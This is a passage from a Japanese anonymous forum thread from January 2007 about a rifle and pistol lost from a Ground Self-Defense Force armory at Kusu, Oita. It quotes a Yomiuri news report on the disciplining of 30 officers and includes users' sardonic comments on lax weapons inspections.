280 :専守防衛さん:2007/01/24(水) 20:54:58
戦車で踏んじゃって員数合わせしようとしていたらバレタ

281 :専守防衛さん:2007/01/24(水) 21:12:50
処分が発表された事で、俄然小銃の紛失が事実であると認識されました。
玖珠駐屯地のみなっさまには、申し訳有りませんが私を殺して、紛失した小銃他の捜索にあたって下さい。
将来、犯罪に使用され、無辜の民を傷つけてからでは遅い問題です。
武器幹部、武器陸曹など今回処分を受けた方もこれですべてがチャラになった訳では有りません。
あなたたちは、家庭を壊してでも紛失した武器の捜索に尽力して下さい。


282 :専守防衛さん:2007/01/24(水) 21:21:35
陸自武器紛失、師団長ら30人を処分
http://www.yomiuri.co.jp/national/news/20070124ic21.htm
大分県玖珠(くす)町の陸上自衛隊玖珠駐屯地で昨年9月、第4戦車大隊の武器庫から小銃や拳銃(各1丁)などが紛失した問題で、防衛省と陸自は24日、武器庫の点検管理がずさんだったとして、火器管理を担当する同大隊本部管理中隊の当時の幹部ら30人を処分した。
紛失した小銃などはまだ見つかって折らず、陸自では内部による盗難事件とみて、大分県警と合同で捜査を進める。
内田益次郎・第4師団長(54)(陸将)を戒告、第4戦車大隊長の2等陸佐(44)、火器管理担当の2等陸尉(46)ら12人を停職(最大20日)。
また、当時中隊長の1等陸尉(48)と、管理担当者の3等陸曹(32)を停職22日の懲戒処分にした。
このほか内規に基づき、林直人・西部方面総監(58)ら4人を訓戒、森勉・陸上幕僚長(59)ら11人を注意処分とした。
陸自によると、同中隊では約3年前から火器管理の規定が守られていなかったことが判明。
幹部が武器などの確認を適切に行っていなかったほか、二つで1組の武器庫のカギを、2人の隊員が別々に管理するという内規も守られていなかった。
陸自では再発防止策として、武器の管理要領を見直すほか、隊員らの所持品点検も強化する。
森陸幕長は「武器紛失は絶対にあってはならない事態で、解決に向け最善を尽くし、武器管理を徹底する」としている。
(2007年1月24日21時1分 読売新聞)


283 :専守防衛さん:2007/01/24(水) 21:34:32
鉄帽が盗まれて売られた後も、毎週装備品の員数チェックをするようになったから、
今度は毎週のようにロッカー点検とかされるようになるんじゃね?

284 :専守防衛さん:2007/01/25(木) 21:36:41
しかし3年も前から点検していなかったなんて信じられん状態だったんだ

66 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)